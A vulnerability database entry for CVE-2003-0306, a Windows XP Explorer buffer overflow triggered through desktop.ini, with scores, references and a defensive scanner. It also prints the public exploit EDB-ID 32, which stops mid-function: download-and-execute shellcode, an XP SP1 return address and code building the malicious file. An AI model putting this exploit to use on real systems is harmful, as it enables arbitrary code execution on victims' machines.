CVE-2003-0306
CVSS 7.2
Published: 2003-06-09 00:00:00
Revised: 2017-10-10 21:29:08

[Original] Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter.


[CNNVD] Windows XP EXPLORER.EXE buffer overflow vulnerability (CNNVD-200306-036)

EXPLORER.EXE in Windows XP contains a buffer overflow vulnerability. An attacker can execute arbitrary code with the privileges of the XP user via a desktop.ini file carrying a .ShellClassInfo parameter.
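A defender-side check for the file type described above, added here as an example and not part of the original record or of the exploit author's code: it decodes a desktop.ini (UTF-16LE with a BOM, as Explorer writes it, or ANSI) and flags [.ShellClassInfo] entries whose value exceeds an assumed 260-character bound (MAX_PATH); the 0xA1C sample length reuses the OVERFLOW_LEN constant from the exploit listing on this page, and both samples are constructed.

```python
import codecs
from typing import List, Tuple

MAX_VALUE_LEN = 260  # assumed bound for a sane .ShellClassInfo value (MAX_PATH)


def decode_ini(raw: bytes) -> str:
    """Decode desktop.ini bytes: UTF-16LE with BOM, UTF-8 with BOM, or ANSI."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[len(codecs.BOM_UTF16_LE):].decode("utf-16-le", errors="replace")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[len(codecs.BOM_UTF8):].decode("utf-8", errors="replace")
    return raw.decode("latin-1")


def find_overlong_shellclassinfo(raw: bytes, limit: int = MAX_VALUE_LEN) -> List[Tuple[str, int]]:
    """Return (key, length) for each [.ShellClassInfo] entry longer than limit.

    A line without '=' inside the section is measured whole, because an
    overflow payload need not be a well-formed key=value pair.
    """
    findings: List[Tuple[str, int]] = []
    section = None
    for line in decode_ini(raw).splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != ".shellclassinfo":
            continue
        key, sep, value = line.partition("=")
        payload = value.strip() if sep else line
        if len(payload) > limit:
            findings.append((key.strip() if sep else "<no key>", len(payload)))
    return findings


def scan_file(path: str) -> List[Tuple[str, int]]:
    """Scan an on-disk desktop.ini; Explorer reads one from every folder it shows."""
    with open(path, "rb") as fh:
        return find_overlong_shellclassinfo(fh.read())


# Constructed samples (not captured from a real system).
BENIGN = codecs.BOM_UTF16_LE + "[.ShellClassInfo]\r\nIconFile=folder.ico\r\nIconIndex=0\r\n".encode("utf-16-le")
OVERFLOW_LEN = 0xA1C  # the length used by the exploit listing on this page
SUSPECT = codecs.BOM_UTF16_LE + ("[.ShellClassInfo]\r\nIconFile=" + "A" * OVERFLOW_LEN + "\r\n").encode("utf-16-le")
```

Run `scan_file` over each desktop.ini on a share or removable drive before it is browsed; a non-empty result is worth quarantining for review.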

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:3095 WinXP Explorer Buffer Overflow
*OVAL describes in detail how this vulnerability is detected; the referenced OVAL definition contains further technical detection details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0306
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0306
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-036
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105284486526310&w=2
(UNKNOWN)  BUGTRAQ  20030511 Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
http://marc.info/?l=bugtraq&m=105301349925036&w=2
(UNKNOWN)  BUGTRAQ  20030515 Re[2]: EXPLOIT: Buffer overflow in Explorer.exe on Windows XP SP1
http://marc.info/?l=vuln-dev&m=105241032526289&w=2
(UNKNOWN)  VULN-DEV  20030507 Buffer overflow in Explorer.exe
http://www.microsoft.com/technet/security/bulletin/ms03-027.asp
(UNKNOWN)  MS  MS03-027

- Vulnerability information

Windows XP EXPLORER.EXE buffer overflow vulnerability
High risk  Buffer overflow
2003-06-09 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

CIAC Advisory N-120; Microsoft bulletin MS03-027 (linked above)

- Exploit information (EDB-ID 32)

MS Windows XP (explorer.exe) Buffer Overflow Exploit (EDBID:32)
windows local
2003-05-21 Verified
0 einstein
N/A
#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
  "\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57" 
  "\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74" 
  "\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c" 
  "\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff" 
  "\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01" 
  "\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00" 
  "\x00\x51\x6a\x00\xff\xd0\x8d\x85\x23\x01\x00\x00\x50\x2e\xff\x95\x17\x01" 
  "\x00\x00\x8d\x9d\x46\x01\x00\x00\x53\x50\x2e\x8b\x9d\x1b\x01\x00\x00\xff" 
  "\xd3\x6a\x01\x8d\x8d\x4e\x01\x00\x00\x51\xff\xd0\x6a\x00\x2e\xff\x95\x1f" 
  "\x01\x00\x00\xbb\x3c\x00\x00\x01\x8b\x0b\x81\xc1\x04\x00\x00\x01\x8d\x41" 
  "\x14\x8b\x70\x68\x81\xc6\x00\x00\x00\x01\x8b\x06\x83\xf8\x00\x74\x51\x05" 
  "\x00\x00\x00\x01\x8b\x56\x10\x81\xc2\x00\x00\x00\x01\x8b\x18\x8b\xcb\x81" 
  "\xe1\x00\x00\x00\x80\x83\xf9\x00\x75\x2a\x81\xc3\x00\x00\x00\x01\x83\xc3" 
  "\x02\x33\xc9\x32\x0b\xc1\xc1\x08\x43\x80\x3b\x00\x75\xf5\x3b\xcf\x75\x04" 
  "\x8b\x3a\xeb\x16\x83\xc2\x04\x83\xc0\x04\x66\x83\x38\x00\x75\xc7\x83\xc6" 
  "\x14\x8b\x10\x83\xfa\x00\x74\xa8\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
  "\x00\x00\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x00\x55\x52\x4c\x4d\x4f\x4e" 
  "\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65" 
  "\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x5c\x7e\x57\x52\x46\x35\x36\x33" 
  "\x34\x2e\x74\x6d\x70\x00";

char unicode_header[] = "\xFF\xFE";
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

#define OVERFLOW_LEN 0xA1C


void main()
{
  char url[]="file://c:/winnt/system32/calc.exe";
 // char url[]="http://localhost/cmd.exe";
  char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)


  char path[500]; 
  strcpy(path,"domain HELL team");
  mkdir(path);
  SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
  strcat(path,"\\desktop.ini");
